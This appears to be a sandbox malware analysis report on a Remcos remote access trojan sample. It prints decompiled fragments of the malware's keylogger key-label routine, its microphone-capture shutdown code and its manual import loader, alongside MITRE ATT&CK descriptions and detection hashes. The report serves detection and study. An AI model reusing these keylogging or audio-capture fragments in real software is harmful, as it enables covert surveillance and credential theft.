Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: 8Et$open
API String ID: 587946157-83843028
Opcode ID: 829f9e020b4fb9afe4b7787cb725b7b9144581f19737eaba14af78e044f1ec72
Instruction ID: e907d504416738f0a0bea1024e9585ce4a57bafbf23c5a8083b315a9cf8fca42
Opcode Fuzzy Hash: 829f9e020b4fb9afe4b7787cb725b7b9144581f19737eaba14af78e044f1ec72
Instruction Fuzzy Hash: DFE092722083049BD304FAB0EC89EBFB398AB52301F80082EF50A81092EF285D4DC221

Uniqueness

Uniqueness Score: -1.00%

Function 00749B6B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00749B6B(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;

				_t7 = __ebx;
				_t12 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t12 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlR]");
						L5:
						E00742084(_t7, _t10);
						return E00748B59(_t12);
					}
				}
				return _t4;
			}

0x00749b6b
0x00749b6e
0x00749b76
0x00749b7c
0x00749b81
0x00749b97
0x00749b9c
0x00749b9e
0x00000000
0x00749b9e
0x00749b83
0x00749b83
0x00749b86
0x00749b8b
0x00749b8d
0x00749ba3
0x00749ba3
0x00000000
0x00749baa
0x00749b86
0x00749bb0

APIs

GetKeyState.USER32(00000012), ref: 00749B70

Strings

[CtrlR], xrefs: 00749B8D
[CtrlL], xrefs: 00749B9E

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 5a8632a9a88b85623d07354fe012321e584fd2a76855a31a9ef05d6c66971103
Instruction ID: fc1c52bee54d93710067e8000b7364fb9e22c13c45bc990c48c16a9d14295a1a
Opcode Fuzzy Hash: 5a8632a9a88b85623d07354fe012321e584fd2a76855a31a9ef05d6c66971103
Instruction Fuzzy Hash: 45E086E13602205BC9153A3DF92A67E3910CB42770F80011AF686DB585CF4F4D1183C2

Uniqueness

Uniqueness Score: -1.00%

Function 007529DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E007529DA(void* __eax, void* __ebp, void* __eflags, char _a12, void* _a124, void* _a148) {
				void* _t16;

				 *0x7aba74 = 1;
				waveInStop(??);
				waveInClose( *0x7abab8);
				_t1 =  &_a12; // 0x744538
				E00741E74(_t1, _t16);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x007529df
0x007529e6
0x007529f2
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

waveInStop.WINMM ref: 007529E6
waveInClose.WINMM ref: 007529F2

Strings

8Et, xrefs: 007533C4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$CloseStop
String ID: 8Et
API String ID: 3638528417-257909599
Opcode ID: 0cbfe65a57c40cdbc52baa9e169b384b9c74032c4062a91e4a6465e6502ae7c0
Instruction ID: 9c08d16f517b0a92474224b75678f934f5b550aa7b20486caa70e1c5f5b61c7f
Opcode Fuzzy Hash: 0cbfe65a57c40cdbc52baa9e169b384b9c74032c4062a91e4a6465e6502ae7c0
Instruction Fuzzy Hash: AFE08631109140CBD310FB24EC096DDBBA0FB93301F808929E459C10B2DF39099ED755

Uniqueness

Uniqueness Score: -1.00%

Function 0077ABB8, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0077ABB8(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E00775507(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E0077A504())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E0077A504())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E007845B6(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E0077A504())) = 0x16;
					return E0077695D() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x0077abb8
0x0077abc1
0x0077abc6
0x0077abc9
0x0077abcd
0x0077abdc
0x0077abdf
0x0077abff
0x0077ac04
0x0077ac07
0x0077ac09
0x0077acd7
0x0077acdd
0x0077acf2
0x0077acfe
0x0077ad04
0x0077ad06
0x0077ad15
0x0077ad15
0x0077ad15
0x0077ad18
0x0077ad18
0x0077ad1c
0x0077ad1e
0x0077ad21
0x0077ad21
0x0077ad21
0x0077ad21
0x00000000
0x0077ad28
0x0077ad0d
0x00000000
0x0077ad0d
0x0077acdf
0x0077ace2
0x0077ace5
0x0077ace5
0x0077ace7
0x0077ace8
0x0077ace8
0x0077acec
0x00000000
0x0077acec
0x0077ac0f
0x0077ac15
0x0077ac42
0x0077ac4e
0x0077ac54
0x0077ac56
0x00000000
0x00000000
0x0077ac5c
0x0077ac62
0x0077ac65
0x0077acc1
0x0077acc6
0x0077acce
0x00000000
0x0077acce
0x0077ac67
0x0077ac6a
0x0077ac6c
0x0077ac6f
0x0077ac71
0x0077ac73
0x0077aca9
0x0077acb7
0x0077acbd
0x0077acbf
0x0077acd3
0x00000000
0x0077acd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0077ac75
0x0077ac75
0x0077ac75
0x0077ac78
0x0077ac7b
0x0077ac7d
0x00000000
0x00000000
0x0077ac87
0x0077ac8e
0x0077ac91
0x0077ac93
0x0077ac9b
0x0077ac9b
0x0077ac9e
0x0077ac9f
0x0077aca2
0x0077aca4
0x00000000
0x00000000
0x00000000
0x0077aca4
0x0077ac95
0x0077ac96
0x0077ac99
0x00000000
0x00000000
0x00000000
0x0077ac99
0x0077aca6
0x00000000
0x0077aca6
0x0077ac17
0x0077ac19
0x00000000
0x00000000
0x0077ac1f
0x0077ac22
0x0077ac26
0x0077ac29
0x0077ac2d
0x00000000
0x00000000
0x0077ac33
0x0077ac34
0x0077ac37
0x0077ac39
0x00000000
0x00000000
0x00000000
0x0077ac3b
0x00000000
0x0077ac22
0x0077abe6
0x00000000
0x0077abf1
0x0077abd3
0x0077abd9
0x00000000
0x0077abd9
0x0077ad30

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00741D39), ref: 0077AC4E
GetLastError.KERNEL32 ref: 0077AC5C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0077ACB7

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6fafbf0848c301fc506a797e3137deebf8a68d1f9bc7f9f27ccb7538f4eac0db
Instruction ID: 2a9ff300e24ddc23b1b4fc2b96d380aa3789a0bb4113996121351aefea0e5b05
Opcode Fuzzy Hash: 6fafbf0848c301fc506a797e3137deebf8a68d1f9bc7f9f27ccb7538f4eac0db
Instruction Fuzzy Hash: D941C630600246BFEF228F64C844A6E7BA5EF81391F25C569E95D5B2A5E7388D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0074F4FE, Relevance: 5.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0074F4FE(intOrPtr* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed short* _v20;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t46;
				signed short _t57;
				signed int _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t76;
				intOrPtr* _t79;
				intOrPtr _t80;
				void _t81;
				signed short* _t82;
				void* _t87;
				intOrPtr* _t88;
				void* _t89;

				_t88 = __ecx;
				_t87 = 1;
				_t41 =  *__ecx;
				_t68 =  *((intOrPtr*)(__ecx + 4));
				_v12 = _t68;
				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
					if(IsBadReadPtr(_t64, 0x14) == 0) {
						_t66 = _t64 + 0x10;
						while(1) {
							_t44 =  *((intOrPtr*)(_t66 - 4));
							if(_t44 == 0) {
								goto L23;
							}
							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
							_v8 = _t46;
							if(_t46 == 0) {
								_push(0x7e);
								goto L22;
							} else {
								_push(4 +  *(_t88 + 0xc) * 4);
								_push( *((intOrPtr*)(_t88 + 8)));
								_t80 = E0077AE34();
								if(_t80 == 0) {
									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
									_push(0xe);
									L22:
									SetLastError();
									_t87 = 0;
								} else {
									 *((intOrPtr*)(_t88 + 8)) = _t80;
									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
									_t81 =  *(_t66 - 0x10);
									if(_t81 == 0) {
										_t81 =  *_t66;
									}
									_t82 = _t81 + _v12;
									_t76 = _v8;
									_v16 =  *_t66 + _v12;
									_v20 = _t82;
									if( *_t82 != 0) {
										while(1) {
											_t57 =  *_t82;
											_push( *((intOrPtr*)(_t88 + 0x34)));
											if(_t57 >= 0) {
												_t58 = _t57 + _v12 + 2;
											} else {
												_t58 = _t57 & 0x0000ffff;
											}
											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
											_t79 = _v16;
											_t89 = _t89 + 0xc;
											 *_t79 = _t59;
											_t60 = _t79;
											_t76 = _v8;
											if( *_t60 == 0) {
												break;
											}
											_t82 =  &(_v20[2]);
											_v16 = _t60 + 4;
											_v20 = _t82;
											if( *_t82 != 0) {
												continue;
											} else {
											}
											goto L16;
										}
										_t87 = 0;
									}
									L16:
									if(_t87 == 0) {
										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t66 = _t66 + 0x14;
										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _t87;
			}

0x0074f505
0x0074f50a
0x0074f50b
0x0074f50d
0x0074f510
0x0074f51a
0x0074f527
0x0074f534
0x0074f53a
0x0074f53d
0x0074f53d
0x0074f542
0x00000000
0x00000000
0x0074f54f
0x0074f552
0x0074f559
0x0074f630
0x00000000
0x0074f55f
0x0074f569
0x0074f56a
0x0074f572
0x0074f578
0x0074f627
0x0074f62c
0x0074f632
0x0074f632
0x0074f638
0x0074f57e
0x0074f584
0x0074f587
0x0074f58a
0x0074f58d
0x0074f592
0x0074f594
0x0074f594
0x0074f596
0x0074f59e
0x0074f5a4
0x0074f5a7
0x0074f5aa
0x0074f5ac
0x0074f5ac
0x0074f5ae
0x0074f5b3
0x0074f5c0
0x0074f5b5
0x0074f5b5
0x0074f5b5
0x0074f5c4
0x0074f5c7
0x0074f5ca
0x0074f5cd
0x0074f5cf
0x0074f5d1
0x0074f5d7
0x00000000
0x00000000
0x0074f5df
0x0074f5e2
0x0074f5e5
0x0074f5eb
0x00000000
0x00000000
0x0074f5ed
0x00000000
0x0074f5eb
0x0074f5ef
0x0074f5ef
0x0074f5f1
0x0074f5f3
0x0074f612
0x0074f619
0x0074f5f5
0x0074f5f5
0x0074f606
0x00000000
0x00000000
0x0074f60c
0x0074f606
0x0074f5f3
0x0074f578
0x00000000
0x0074f559
0x0074f53d
0x0074f63a
0x0074f63a
0x0074f642

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0074F89B), ref: 0074F52C
IsBadReadPtr.KERNEL32(?,00000014,?,0074F89B), ref: 0074F5FE
SetLastError.KERNEL32(0000007F), ref: 0074F619
SetLastError.KERNEL32(0000007E,?,0074F89B), ref: 0074F632

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: fd1f4cbf8099bd9485b688b27bdfe4516c50eb5193b930f4492074520559eca0
Instruction ID: 43cbb0943be27cf41e1875fc5656ac87bb1f7ff421287a1e45c38727d1b4b1bc
Opcode Fuzzy Hash: fd1f4cbf8099bd9485b688b27bdfe4516c50eb5193b930f4492074520559eca0
Instruction Fuzzy Hash: 8E416571A00205EFEB24CF58DC85B6AB7F6FF88310F1484AAE446D7250EB39E911DB11

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ZfigYV6HXd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
libraryloaderCOMMON

Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774
synchronizationCOMMON

Function 00411929, Relevance: 30.5, APIs: 6, Strings: 11, Instructions: 743
sleepnetworkthreadCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

